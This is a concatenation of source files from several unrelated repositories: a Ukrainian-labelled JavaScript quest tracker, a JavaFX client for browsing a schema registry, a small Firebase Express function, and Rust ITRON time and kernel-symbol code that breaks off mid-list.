Object.setPrototypeOf(Date, DateOriginal)<file_sep>//обєкт для перетворення статусу з інгл на укр
// Ukrainian display labels for quest statuses.
const statusUKR = {done: 'завершено', ongoing: 'триває', failed: 'провалено'}
// Ukrainian week-day abbreviations indexed by Date#getDay() (0 = Sunday).
const weekDaysUKR = ['нд', 'пн', 'вт', 'ср', 'чт', 'пт', 'сб']
// Render the non-archived activities and wire up their row buttons:
// "take quest" (requires enough confidence), "details" and "archive".
function showActivities() {
  activityList.innerHTML = activities.filter(activity => !activity.archived)
    .map(buildActivityItem).join('')
  activityList.querySelectorAll('details').forEach(element => {
    element.ontoggle = closeOtherDetails
  });
  activityList.querySelectorAll('button').forEach(btn => {
    const label = btn.innerText.trim()
    if (label == 'Взяти квест') {
      btn.onclick = () => {
        // a quest can only be taken when confidence covers its difficulty
        if (confidence() >= +btn.dataset.diff) showGetQuestModal(btn.parentElement.dataset.id)
        else showAlert('Недостатньо віри в себе на цей квест')
      }
    } else if (label == 'Деталі') {
      btn.onclick = () => {
        showActivityInfoModal(btn.parentElement.dataset.id)
      }
    } else if (label == 'В архів') {
      btn.onclick = () => {
        moveToArchive(btn.parentElement.dataset.id)
        showActivities()
      }
    }
  })
}
// Render the non-archived quests and wire up their "archive" and
// "details" buttons.
function showQuests() {
  questList.innerHTML = quests.filter(quest => !quest.archived)
    .map(buildQuestItem).join('')
  questList.querySelectorAll('details').forEach(element => {
    element.ontoggle = closeOtherDetails
  });
  questList.querySelectorAll('button').forEach(btn => {
    const label = btn.innerText.trim()
    if (label == 'В архів') {
      btn.onclick = () => {
        moveToArchive(btn.dataset.id)
        showQuests()
      }
    }
    if (label == 'Деталі') {
      btn.onclick = () => {
        showQuestInfoModal(btn.dataset.id)
      }
    }
  })
}
// Show the current confidence score in the header.
function showConfidence() {
  confidenceView.innerText = confidence()
}
// Format a Date as an ISO calendar date (YYYY-MM-DD) using local time.
function dateToISO(dateObject) {
  const year = dateObject.getFullYear()
  // getMonth() is 0-based; pad month and day to two digits.
  const month = String(dateObject.getMonth() + 1).padStart(2, '0')
  const date = String(dateObject.getDate()).padStart(2, '0')
  return `${year}-${month}-${date}`
}
// Convert an ISO date string (YYYY-MM-DD) into GOST format (DD.MM.YYYY).
function isoToGOST(isoDate) {
  return isoDate.split('-').reverse().join('.')
}
// Turn an ISO date into "day-of-month, weekday-abbreviation" (Ukrainian),
// e.g. '2020-10-04' -> '4, нд'.
function isoToWeekDay(isoDate) {
  const dateObj = new Date(isoDate)
  const date = dateObj.getDate()
  const weekDay = weekDaysUKR[dateObj.getDay()]
  return `${date}, ${weekDay}`
}
// Show the generic alert modal with the given message.
function showAlert(msg) {
  alertMsg.innerText = msg
  alertGlass.hidden = false
}
// Show the generic prompt modal. `handler` receives the input's value on
// OK and must return true to allow the modal to close.
function showPrompt(msg, type, handler) {
  promptMsg.innerText = msg
  promptInp.type = type
  promptGlass.hidden = false
  promptModal.querySelector('button').onclick = () => {
    if (handler(promptInp.value)) promptGlass.hidden = true
  }
}
// Render the current date and time in the header clock widget.
function showDateTime() {
  dateTimeView.innerHTML = `<div>${getCurrentDate()}</div><h3>${getCurrentTime()}</h3>`
}
// Update the button badges: count of todos planned for today and count of
// overdue (past, still planned) todos.
function showTodoCount() {
  showTodoBtn.dataset.count = todos.filter(todo =>
    todo.date == dateToISO(new Date) && todo.status == 'planned').length
  reportBtn.dataset.count = todos.filter(todo =>
    todo.date < dateToISO(new Date) && todo.status == 'planned').length
}
// Today's date in GOST (DD.MM.YYYY) format.
function getCurrentDate() {
  return isoToGOST(dateToISO(new Date))
}
// Current wall-clock time as a zero-padded "HH:MM" string.
function getCurrentTime() {
  const date = new Date
  const hour = String(date.getHours()).padStart(2, '0')
  const minute = String(date.getMinutes()).padStart(2, '0')
  return `${hour}:${minute}`
}
// Hand out the next unique id and advance the persisted counter.
function newID() {
  const nextID = +localStorage.nextID
  localStorage.nextID = nextID + 1
  return nextID
}
// Read (no argument) or adjust (signed delta) the persisted confidence
// score. Returns the current value only when reading.
function confidence(value) {
  let confidence = +localStorage.confidence
  if (value === undefined) return confidence
  confidence += value
  localStorage.confidence = confidence
}
| f572be085bf29140fea2a9ecc29469f36ce9920a | [
"JavaScript"
] | 7 | JavaScript | SerhiiShymchuk/pacer | 868f72915a5880e2ba2718a9b5e6d0ef635f0c6e | 6e2d61e70f8ffee9fc5d90d4369a836879da5f89 |
refs/heads/master | <file_sep>package regfx.model;
import javafx.collections.FXCollections;
import javafx.collections.MapChangeListener;
import javafx.collections.ObservableMap;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.logging.Logger;
import java.util.prefs.BackingStoreException;
import java.util.prefs.Preferences;
import java.util.stream.Collectors;
/**
 * Persists named preference nodes (one child node per URL) under the user
 * preferences tree and mirrors them in an observable map so UI code can
 * react to additions and removals. Map mutations are written through to the
 * backing {@link Preferences} store and flushed immediately.
 */
public class MainModel {

    private final static String URLS = "URLs";

    // Child of this package's user-preferences node holding one sub-node per URL.
    private Preferences userUrlsNode = Preferences.userNodeForPackage(MainModel.class).node(URLS);

    private Logger log = Logger.getLogger("regfx");

    // In-memory view of the stored nodes; see the write-through listener below.
    private ObservableMap<String, Map<String, String>> observablePreferences = FXCollections.observableMap(new HashMap<>());

    public MainModel() {
        // Write-through listener: keep the Preferences store in sync with the map.
        addPreferencesListener((MapChangeListener<? super String, ? super Map<String, String>>) chg -> {
            if (chg.wasAdded()) {
                setNode(chg.getKey(), chg.getValueAdded());
            } else if (chg.wasRemoved()) {
                removeNode(chg.getKey());
            }
            try {
                savePreferences();
            } catch (BackingStoreException e) {
                log.throwing(this.getClass().getPackageName(), "MainModel", e);
            }
        });
    }

    public void addPreferencesListener(MapChangeListener<? super String, ? super Map<String, String>> listener) {
        observablePreferences.addListener(listener);
    }

    /** Loads one child node's key/value pairs into the observable map. */
    private void readNode(String nodeName) {
        try {
            Preferences nodeForUrl = userUrlsNode.node(nodeName);
            Map<String, String> props = Arrays.stream(nodeForUrl.keys())
                    .collect(Collectors.toMap(
                            Function.identity(),
                            key -> nodeForUrl.get(key, "")
                    ));
            addPreferences(nodeName, props);
        } catch (BackingStoreException e) {
            log.throwing(this.getClass().getPackageName(), "readNode", e);
        }
    }

    private void setNode(String nodeName, Map<String, String> props) {
        Preferences nodeForUrl = userUrlsNode.node(nodeName);
        props.forEach(nodeForUrl::put);
    }

    private void removeNode(String nodeName) {
        try {
            userUrlsNode.node(nodeName).removeNode();
        } catch (BackingStoreException e) {
            // Fix: previously logged "MainModel" as the originating method name.
            log.throwing(this.getClass().getPackageName(), "removeNode", e);
        }
    }

    private void savePreferences() throws BackingStoreException {
        userUrlsNode.flush();
    }

    /** Reads every stored child node into the observable map. */
    public void readPreferences() throws BackingStoreException {
        Arrays.stream(userUrlsNode.childrenNames()).forEach(this::readNode);
    }

    public void addPreferences(String key, Map<String, String> props) {
        observablePreferences.put(key, props);
    }

    public void removePreferences(String key) {
        observablePreferences.remove(key);
    }
}
<file_sep>/**
* Sample Skeleton for 'regfx-main.fxml' Controller Class
*/
package regfx;
import com.hortonworks.registries.schemaregistry.SchemaBranch;
import com.hortonworks.registries.schemaregistry.SchemaMetadataInfo;
import com.hortonworks.registries.schemaregistry.SchemaVersionInfo;
import com.hortonworks.registries.schemaregistry.utils.ObjectMapperUtils;
import javafx.application.Platform;
import javafx.beans.binding.Bindings;
import javafx.beans.property.ReadOnlyObjectProperty;
import javafx.collections.MapChangeListener;
import javafx.event.ActionEvent;
import javafx.fxml.FXML;
import javafx.scene.control.ChoiceBox;
import javafx.scene.control.Label;
import javafx.scene.control.Menu;
import javafx.scene.control.MenuItem;
import javafx.scene.control.TableColumn;
import javafx.scene.control.TableView;
import javafx.scene.control.cell.MapValueFactory;
import regfx.dialogs.Dialogs;
import regfx.model.MainModel;
import regfx.model.SchemaBranches;
import regfx.model.SchemaEnum;
import regfx.model.SchemaModel;
import regfx.model.SchemaVersions;
import regfx.model.Schemas;
import regfx.model.VersionEnum;
import regfx.model.VersionModel;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URL;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.util.EnumMap;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;
import java.util.ResourceBundle;
import java.util.logging.Logger;
import java.util.prefs.BackingStoreException;
/**
 * JavaFX controller for the main window. Lets the user connect to a schema
 * registry over HTTP, lists the registry's schemas in a table, and shows the
 * branches and versions of the currently selected schema.
 */
public class MainController {

    private Logger log = Logger.getLogger("regfx");

    // Persisted connection settings; mirrored into the "Preferences" menu.
    private MainModel model = new MainModel();
    // Backing models for the schema table and the version table.
    private SchemaModel schemaModel = new SchemaModel();
    private VersionModel versionModel = new VersionModel();

    @FXML // ResourceBundle that was given to the FXMLLoader
    private ResourceBundle resources;

    @FXML // URL location of the FXML file that was given to the FXMLLoader
    private URL location;

    // Schema table and its columns (one column per SchemaEnum key).
    @FXML
    private TableView<Map<SchemaEnum, String>> schemaTable;

    @FXML
    private TableColumn<Map, String> idColumn;

    @FXML
    private TableColumn<Map, String> nameColumn;

    @FXML
    private TableColumn<Map, String> descColumn;

    @FXML
    private TableColumn<Map, String> typeColumn;

    @FXML
    private TableColumn<Map, String> compColumn;

    // Displays the number of versions currently listed.
    @FXML
    private Label versionsLabel;

    // Branch selector for the selected schema.
    @FXML
    private ChoiceBox<String> choiceBox;

    // Version table and its columns (one column per VersionEnum key).
    @FXML
    private TableView<Map<VersionEnum, String>> versionTable;

    @FXML
    private TableColumn<Map, String> versionIdColumn;

    @FXML
    private TableColumn<Map, String> versionVersionColumn;

    @FXML
    private TableColumn<Map, String> versionShemaTextColumn;

    @FXML // fx:id="registryMenu"
    private Menu registryMenu; // Value injected by FXMLLoader

    @FXML // fx:id="connectMenu"
    private MenuItem connectMenu; // Value injected by FXMLLoader

    @FXML
    private Menu preferencesMenu;

    @FXML // fx:id="quitMenu"
    private MenuItem quitMenu; // Value injected by FXMLLoader

    // Connection properties of the registry we are currently connected to.
    private Map<String, String> schemaRegistryProps = new HashMap<>();
    // Live selection properties; assigned at the end of initialize().
    private ReadOnlyObjectProperty<String> selectedBranch;
    private ReadOnlyObjectProperty<Map<SchemaEnum, String>> selectedSchema;

    public MainController() throws BackingStoreException { }

    /**
     * Menu handler: asks the user for connection parameters, persists them
     * under the key "hostname:port", then connects to that registry.
     */
    @FXML
    void connectToRegistry(ActionEvent event) throws IOException {
        Map<String, String> props = Dialogs.loadAndShowDialog("dialog-connect", HashMap<String, String>::new);
        if (props.size() != 0 && props.containsKey("hostname") && props.containsKey("port")) {
            model.addPreferences(props.get("hostname") + ":" + props.get("port"), props);
        } else {
            log.warning(String.format("Not enough connection parameters: %s", props));
            return;
        }
        try {
            connectToRegistry(props);
        } catch (Exception e) {
            log.throwing("MainController", "connectToRegistry", e);
        }
    }

    /**
     * Fetches all schema metadata from the registry described by {@code props}
     * and, on success, makes it the current registry and repopulates the
     * schema table.
     */
    void connectToRegistry(Map<String, String> props) {
        Optional<Schemas> result = HttpUtil.Rest.of(props, "/api/v1/schemaregistry/schemas").execute(Schemas.class);
        result.ifPresent(schemas -> {
            updateCurrentRegistry(props);
            schemaModel.getTable().clear();
            for (SchemaMetadataInfo metadataInfo : schemas.entities) {
                Map<SchemaEnum, String> map = new EnumMap<>(SchemaEnum.class);
                map.put(SchemaEnum.ID, String.valueOf(metadataInfo.getId()));
                map.put(SchemaEnum.NAME, metadataInfo.getSchemaMetadata().getName());
                map.put(SchemaEnum.DESCRIPTION, metadataInfo.getSchemaMetadata().getDescription());
                map.put(SchemaEnum.TYPE, metadataInfo.getSchemaMetadata().getType());
                map.put(SchemaEnum.COMPATIBILITY, metadataInfo.getSchemaMetadata().getCompatibility().name());
                schemaModel.getTable().add(map);
            }
        });
    }

    /**
     * Loads all versions of the given schema on the given branch into the
     * version table.
     */
    void getSchemaVersion(Map<SchemaEnum, String> metadata, String branch) {
        Optional<SchemaVersions> result = HttpUtil.Rest.of(
                schemaRegistryProps,
                "/api/v1/schemaregistry/schemas/" + metadata.get(SchemaEnum.NAME) + "/versions",
                "branch=" + branch)
                .execute(SchemaVersions.class);
        result.ifPresent(schemaVersions -> {
            versionModel.getTable().clear();
            for (SchemaVersionInfo schemaVersion : schemaVersions.entities) {
                Map<VersionEnum, String> map = new EnumMap<>(VersionEnum.class);
                map.put(VersionEnum.VERSION_ID, String.valueOf(schemaVersion.getId()));
                map.put(VersionEnum.VERSION_VERSION, String.valueOf(schemaVersion.getVersion()));
                map.put(VersionEnum.SCHEMATEXT, schemaVersion.getSchemaText());
                versionModel.getTable().add(map);
            }
        });
    }

    /**
     * Loads the branch names of the given schema into the choice box and
     * selects the first one (which in turn triggers a version reload via the
     * choice box's selection listener).
     */
    private void getSchemaBranches(Map<SchemaEnum, String> metadata) {
        Optional<SchemaBranches> result = HttpUtil.Rest.of(
                schemaRegistryProps,
                "/api/v1/schemaregistry/schemas/" + metadata.get(SchemaEnum.NAME) + "/branches")
                .execute(SchemaBranches.class);
        result.ifPresent(schemaBranches -> {
            schemaModel.getBranchNames().clear();
            for (SchemaBranch schemaBranch : schemaBranches.entities) {
                schemaModel.getBranchNames().add(schemaBranch.getName());
            }
            choiceBox.getSelectionModel().selectFirst();
        });
    }

    /** Remembers {@code props} as the currently connected registry. */
    private void updateCurrentRegistry(Map<String, String> props) {
        schemaRegistryProps.clear();
        schemaRegistryProps.putAll(props);
    }

    /** Menu handler: exits the application. */
    @FXML
    void quitFromApp(ActionEvent event) {
        Platform.exit();
    }

    /**
     * Wires tables, the branch choice box, and the preferences menu to their
     * backing models.
     */
    @FXML // This method is called by the FXMLLoader when initialization is complete
    void initialize() throws BackingStoreException {
        assert registryMenu != null : "fx:id=\"registryMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
        assert connectMenu != null : "fx:id=\"connectMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
        assert preferencesMenu != null : "fx:id=\"preferencesMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";
        assert quitMenu != null : "fx:id=\"quitMenu\" was not injected: check your FXML file 'regfx-main.fxml'.";

        // Populate the preferences menu from previously saved registries.
        model.addPreferencesListener(createPrefsListener());
        model.readPreferences();

        // Schema table: each row is a Map keyed by SchemaEnum.
        schemaTable.setItems(schemaModel.getTable());
        idColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.ID));
        nameColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.NAME));
        descColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.DESCRIPTION));
        typeColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.TYPE));
        compColumn.setCellValueFactory(new MapValueFactory<String>(SchemaEnum.COMPATIBILITY));
        // NOTE(review): newValue can be null when the selection is cleared, and
        // selectedBranch still holds the previous schema's branch here — confirm.
        schemaTable.getSelectionModel().selectedItemProperty().addListener((observableValue, oldValue, newValue) -> {
            getSchemaBranches(newValue);
            getSchemaVersion(newValue, selectedBranch.getValue());
        });
        selectedSchema = schemaTable.getSelectionModel().selectedItemProperty();

        // Version table: each row is a Map keyed by VersionEnum.
        versionTable.setItems(versionModel.getTable());
        versionIdColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.VERSION_ID));
        versionVersionColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.VERSION_VERSION));
        versionShemaTextColumn.setCellValueFactory(new MapValueFactory<String>(VersionEnum.SCHEMATEXT));
        versionsLabel.textProperty().bind(Bindings.size(versionModel.getTable()).asString());

        // Branch choice box: re-query versions whenever the branch changes.
        choiceBox.setItems(schemaModel.getBranchNames());
        choiceBox.getSelectionModel().selectedItemProperty().addListener((observableValue, oldValue, newValue) -> {
            getSchemaVersion(selectedSchema.get(), newValue);
        });
        selectedBranch = choiceBox.getSelectionModel().selectedItemProperty();
    }

    /**
     * Listener that mirrors preference additions/removals into the
     * "Preferences" menu.
     */
    private MapChangeListener<? super String,? super Map<String, String>> createPrefsListener() {
        return chg -> {
            if (chg.wasAdded()) {
                addMenuItem(chg.getKey(), chg.getValueAdded());
            } else if (chg.wasRemoved()) {
                preferencesMenu.getItems().removeIf(mi -> mi.getText().contains(chg.getKey()));
            }
        };
    }

    /** Adds a "Connect to"/"Delete" menu-item pair for a saved registry. */
    private void addMenuItem(String key, Map<String, String> props) {
        MenuItem connectItem = new MenuItem("Connect to " + key);
        connectItem.setOnAction(event -> connectToRegistry(props));
        MenuItem deleteItem = new MenuItem("Delete " + key);
        deleteItem.setOnAction(event -> model.removePreferences(key));
        preferencesMenu.getItems().addAll(connectItem, deleteItem);
    }
}
<file_sep>package regfx.model;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import java.util.ArrayList;
import java.util.Optional;
import java.util.stream.Collectors;
/**
 * Model backing the connection dialog: the fixed set of supported connection
 * parameter names plus the parameter/value rows currently shown in the
 * dialog's table.
 */
public class ConnectModel {

    /** All parameter names a connection may specify (read-only view). */
    private final ObservableList<String> parameters =
            FXCollections.unmodifiableObservableList(
                    FXCollections.observableArrayList(
                            "hostname",
                            "port",
                            "path")
            );

    /** Parameter/value pairs currently present in the dialog table. */
    private final ObservableList<Pair<String, String>> tablerows = FXCollections.observableArrayList();

    public ObservableList<String> getParameters() {
        return parameters;
    }

    /**
     * Returns the first parameter name not yet used by any table row, or an
     * empty {@link Optional} when every parameter is already taken.
     */
    public Optional<String> getUnusedParameter() {
        return parameters.stream()
                .filter(name -> tablerows.stream().noneMatch(row -> name.equals(row.getKey())))
                .findFirst();
    }

    public ObservableList<Pair<String, String>> getTablerows() {
        return tablerows;
    }
}
<file_sep># registry-fx
A JavaFX toy project that fetches content from a Schema Registry.
<file_sep>module regfx {
    // JavaFX runtime: UI controls and FXML loading.
    requires javafx.controls;
    requires javafx.fxml;
    // JDK modules: logging, Preferences storage, HTTP client.
    requires java.logging;
    requires java.prefs;
    requires java.net.http;
    // Schema Registry model classes and JSON (de)serialization.
    requires schema.registry.common;
    requires com.fasterxml.jackson.databind;
    // Open packages for reflective access by FXML and Jackson.
    opens regfx to javafx.fxml;
    opens regfx.dialogs to javafx.fxml;
    opens regfx.model to javafx.base, com.fasterxml.jackson.databind;
    exports regfx;
}
<file_sep>handlers= java.util.logging.FileHandler
.level= INFO
java.util.logging.FileHandler.level = INFO
java.util.logging.FileHandler.formatter = java.util.logging.SimpleFormatter
regfx.handlers = java.util.logging.FileHandler<file_sep>package regfx.model;
/** Keys for the displayed attributes of a schema (used as table-column map keys). */
public enum SchemaEnum {
    ID, NAME, DESCRIPTION, TYPE, COMPATIBILITY;
}
<file_sep>package regfx.model;
/** Keys for the displayed attributes of a schema version (table-column map keys). */
public enum VersionEnum {
    VERSION_ID, VERSION_VERSION, SCHEMATEXT
}
| 050eb2bc979702ea77ce49c651894598bfcf22a9 | [
"Markdown",
"Java",
"INI"
] | 8 | Java | heritamas/registry-fx | 33668f55217e6fa1c3fd95fb1a8155959bfbf264 | c8ce19b89aa3c315f086047b48d52994c80cc536 |
refs/heads/master | <repo_name>shiratsu/fir-hiratsuka<file_sep>/functions/index.js
const functions = require('firebase-functions');
const express = require('express');
const path = require('path');

// Express app exported (below) as a single Firebase HTTPS function.
const app = express();
const indexRouter = require('./routes/index');

// Jade templates live under ./views.
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'jade');

// Request-body parsing.
app.use(express.json());
app.use(express.urlencoded({ extended: false }));
// NOTE(review): static assets are served from ./routes — conventionally this
// would be ./public; confirm whether this is intentional.
app.use(express.static(path.join(__dirname, 'routes')));

// Application routes.
app.use('/', indexRouter);

// "Big Ben" endpoint: one BONG per hour on a 12-hour clock.
app.get('/api', (req, res) => {
  const now = new Date();
  const hours = (now.getHours() % 12) + 1; // London is UTC + 1hr;
  res.json({ bongs: 'BONG '.repeat(hours) });
});
exports.app = functions.https.onRequest(app); | 42cc4efa36b048574869f237ea5feb695a304310 | [
"JavaScript"
] | 1 | JavaScript | shiratsu/fir-hiratsuka | 2cdc4e6de0f7005027250800e53b160d31ed5e0c | 6c04b1e13c405a6df510b54dbc970ea74c047965 |
refs/heads/main | <repo_name>kawadakk/itron-rs<file_sep>/src/time/duration.rs
use crate::abi;
use core::{convert::TryFrom, time::Duration as StdDuration};
use super::Timeout;
/// A valid relative time value ([`abi::RELTIM`]).
#[cfg_attr(
    feature = "nightly",
    doc = "[`duration!`] can be used to construct a `Duration` in a concise syntax."
)]
#[cfg_attr(
    not(feature = "nightly"),
    doc = "If `nightly` feature is enabled, \
    `duration!` can be used to construct a `Duration` in a concise syntax."
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
#[repr(transparent)]
pub struct Duration {
    // Invariant: always a valid relative time value (see `from_raw`'s safety
    // contract).
    value: abi::RELTIM,
}
impl Duration {
    /// The zero duration, which causes polling.
    // Safety: It's a valid duration value
    pub const ZERO: Self = unsafe { Self::from_raw(0) };

    /// Construct a new `Duration` from a raw value.
    ///
    /// # Safety
    ///
    /// `value` must be a valid duration value. This crate treats `E_PAR` caused
    /// by invalid duration values as a [critical error].
    ///
    /// [critical error]: crate::error
    #[inline]
    pub const unsafe fn from_raw(value: abi::RELTIM) -> Self {
        Self { value }
    }

    /// Get the raw `RELTIM` value.
    #[inline]
    pub const fn as_raw(self) -> abi::RELTIM {
        self.value
    }

    /// Construct a new `Duration` from the specified number of seconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_secs(secs: u64) -> Option<Self> {
        // Guard against overflow of the multiplication below.
        if secs > u64::MAX / 1_000_000 {
            None
        } else {
            Self::from_micros(secs * 1_000_000)
        }
    }

    /// Construct a new `Duration` from the specified number of milliseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_millis(millis: u64) -> Option<Self> {
        // Guard against overflow of the multiplication below.
        if millis > u64::MAX / 1_000 {
            None
        } else {
            Self::from_micros(millis * 1_000)
        }
    }

    /// Construct a new `Duration` from the specified number of microseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub const fn from_micros(micros: u64) -> Option<Self> {
        // NOTE(review): degenerate single-arm `match ()` — presumably kept so
        // kernel-specific arms can be added behind `cfg`; confirm.
        match () {
            () => {
                // `TMAX_RELTIM` is the kernel's maximum relative time.
                if micros > abi::TMAX_RELTIM as u64 {
                    None
                } else {
                    // Safety: It's a valid duration value
                    Some(unsafe { Self::from_raw(micros as u32) })
                }
            }
        }
    }

    /// Construct a new `Duration` from the specified number of nanoseconds.
    ///
    /// Returns `None` if the specified duration is not representable.
    #[inline]
    pub fn from_nanos(nanos: u128) -> Option<Self> {
        // TODO: make it `const fn`
        // Integer division truncates (the sub-microsecond part is dropped).
        u64::try_from(nanos / 1_000)
            .ok()
            .and_then(Self::from_micros)
    }
}
impl TryFrom<StdDuration> for Duration {
    type Error = super::TryFromDurationError;

    /// Converts a `core::time::Duration`, failing when the value does not fit
    /// in the kernel's relative-time range.
    #[inline]
    fn try_from(d: StdDuration) -> Result<Self, Self::Error> {
        match Self::from_nanos(d.as_nanos()) {
            Some(duration) => Ok(duration),
            None => Err(super::TryFromDurationError(())),
        }
    }
}
impl TryFrom<Timeout> for Duration {
    type Error = super::TryFromDurationError;

    // A finite `Timeout` converts directly; an infinite one is not a valid
    // relative time and is rejected.
    #[inline]
    fn try_from(d: Timeout) -> Result<Self, Self::Error> {
        // NOTE(review): degenerate single-arm `match ()` — presumably kept so
        // kernel-specific arms can be added behind `cfg`; confirm.
        match () {
            () => {
                // In TOPPERS 3rd gen kernel, both types use the same range
                if d.is_finite() {
                    // Safety: It's a valid timeout value
                    Ok(unsafe { Self::from_raw(d.as_raw()) })
                } else {
                    Err(super::TryFromDurationError(()))
                }
            }
        }
    }
}
/// Construct a [`Duration`] value in a concise syntax. Panics if the specified
/// duration cannot be represented by `Duration`.
///
/// # Examples
///
/// ```
/// use itron::time::{duration, Duration};
/// assert_eq!(Duration::ZERO, duration!(0));
/// assert_eq!(Duration::from_millis(42).unwrap(), duration!(ms: 42));
/// ```
///
/// Panics if the value is out of range:
///
/// ```should_panic
/// # use itron::time::duration;
/// let _ = duration!(s: 0x7ffffffffffffff * 2);
/// ```
///
/// Once [`inline_const`] lands, it will be possible to do the check at
/// compile-time:
///
/// ```compile_fail
/// #![feature(inline_const)]
/// # use itron::time::duration;
/// let _ = const { duration!(s: 0x7ffffffffffffff * 2) };
/// ```
///
/// Literal values are validated at compile-time regardless of whether
/// `const { ... }` is used or not:
///
/// ```compile_fail
/// # use itron::time::duration;
/// let _ = duration!(s: 0xfffffffffffffff);
/// ```
///
/// ```should_panic
/// # use itron::time::duration;
/// // Wrap the expression with `( ... )` to avoid the above behavior and
/// // cause a runtime panic.
/// let _ = duration!(s: (0xfffffffffffffff));
/// ```
///
/// [`inline_const`]: https://rust-lang.github.io/rfcs/2920-inline-const.html
#[cfg(feature = "nightly")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "nightly")))]
pub macro duration {
    // Compile-time checked literals: route the literal through a `const` item
    // so an out-of-range value fails at compile time. The `( ... )` wrapper in
    // the recursive call prevents re-matching this arm.
    ($kind:tt: $value:literal) => {{
        const VALUE: $crate::time::Duration = $crate::time::duration!($kind: ($value));
        VALUE
    }},
    // Seconds
    (s: $value:expr) => {
        $crate::time::expect_valid_duration($crate::time::Duration::from_secs($value))
    },
    // Milliseconds
    (ms: $value:expr) => {
        $crate::time::expect_valid_duration($crate::time::Duration::from_millis($value))
    },
    // Microseconds
    (us: $value:expr) => {
        $crate::time::expect_valid_duration($crate::time::Duration::from_micros($value))
    },
    // Microseconds (Unicode alias of `us`)
    (μs: $value:expr) => {
        $crate::time::expect_valid_duration($crate::time::Duration::from_micros($value))
    },
    // Nanoseconds
    (ns: $value:expr) => {
        $crate::time::expect_valid_duration($crate::time::Duration::from_nanos($value))
    },
    // Zero
    (0) => { $crate::time::Duration::ZERO },
}
/// Panics if the specified `Option<Duration>` is `None`. Used by `duration!`.
#[cfg(feature = "nightly")]
#[doc(hidden)]
#[track_caller]
#[inline]
pub const fn expect_valid_duration(x: Option<Duration>) -> Duration {
    if let Some(x) = x {
        x
    } else {
        // Panics in `const fn` are unstable at the point of writing
        // so failure is forced via an unconditional division by zero: in a
        // const context this is a compile-time error; at runtime it panics.
        // The long variable name doubles as the "error message".
        let zero = 0u32;
        #[allow(unconditional_panic)]
        let __the_specified_timeout_is_invalid_or_not_representable__ = 1 / zero;
        // Unreachable; satisfies the `Duration` return type without `panic!`.
        #[allow(clippy::empty_loop)]
        loop {}
    }
}
<file_sep>/tests/abi/fmp3.rs
//! Based on TOPPERS/FMP3 (Release 3.2) `kernel.h`
use super::symbols;
/// Marker type describing the TOPPERS/FMP3 kernel's ABI.
pub struct Abi;

impl super::KernelAbi for Abi {
    /// Registers every service call declared by TOPPERS/FMP3 (Release 3.2)
    /// `kernel.h`, so the test can diff this set against `itron::abi`.
    fn get_symbols(&self, b: &mut super::SymbolsBuilder) {
        // Task management
        b.insert_func(symbols::known_funcs::act_tsk);
        b.insert_func(symbols::known_funcs::mact_tsk);
        b.insert_func(symbols::known_funcs::can_act);
        b.insert_func(symbols::known_funcs::mig_tsk);
        b.insert_func(symbols::known_funcs::get_tst);
        b.insert_func(symbols::known_funcs::chg_pri);
        b.insert_func(symbols::known_funcs::get_pri);
        b.insert_func(symbols::known_funcs::get_inf);
        b.insert_func(symbols::known_funcs::chg_spr);
        b.insert_func(symbols::known_funcs::ref_tsk);
        // Task synchronization
        b.insert_func(symbols::known_funcs::slp_tsk);
        b.insert_func(symbols::known_funcs::tslp_tsk);
        b.insert_func(symbols::known_funcs::wup_tsk);
        b.insert_func(symbols::known_funcs::can_wup);
        b.insert_func(symbols::known_funcs::rel_wai);
        b.insert_func(symbols::known_funcs::sus_tsk);
        b.insert_func(symbols::known_funcs::rsm_tsk);
        b.insert_func(symbols::known_funcs::dly_tsk);
        // Task termination
        b.insert_func(symbols::known_funcs::ext_tsk);
        b.insert_func(symbols::known_funcs::ras_ter);
        b.insert_func(symbols::known_funcs::dis_ter);
        b.insert_func(symbols::known_funcs::ena_ter);
        b.insert_func(symbols::known_funcs::sns_ter);
        b.insert_func(symbols::known_funcs::ter_tsk);
        // Semaphores
        b.insert_func(symbols::known_funcs::sig_sem);
        b.insert_func(symbols::known_funcs::wai_sem);
        b.insert_func(symbols::known_funcs::pol_sem);
        b.insert_func(symbols::known_funcs::twai_sem);
        b.insert_func(symbols::known_funcs::ini_sem);
        b.insert_func(symbols::known_funcs::ref_sem);
        // Eventflags
        b.insert_func(symbols::known_funcs::set_flg);
        b.insert_func(symbols::known_funcs::clr_flg);
        b.insert_func(symbols::known_funcs::wai_flg);
        b.insert_func(symbols::known_funcs::pol_flg);
        b.insert_func(symbols::known_funcs::twai_flg);
        b.insert_func(symbols::known_funcs::ini_flg);
        b.insert_func(symbols::known_funcs::ref_flg);
        // Data queues
        b.insert_func(symbols::known_funcs::snd_dtq);
        b.insert_func(symbols::known_funcs::psnd_dtq);
        b.insert_func(symbols::known_funcs::tsnd_dtq);
        b.insert_func(symbols::known_funcs::fsnd_dtq);
        b.insert_func(symbols::known_funcs::rcv_dtq);
        b.insert_func(symbols::known_funcs::prcv_dtq);
        b.insert_func(symbols::known_funcs::trcv_dtq);
        b.insert_func(symbols::known_funcs::ini_dtq);
        b.insert_func(symbols::known_funcs::ref_dtq);
        // Priority data queues
        b.insert_func(symbols::known_funcs::snd_pdq);
        b.insert_func(symbols::known_funcs::psnd_pdq);
        b.insert_func(symbols::known_funcs::tsnd_pdq);
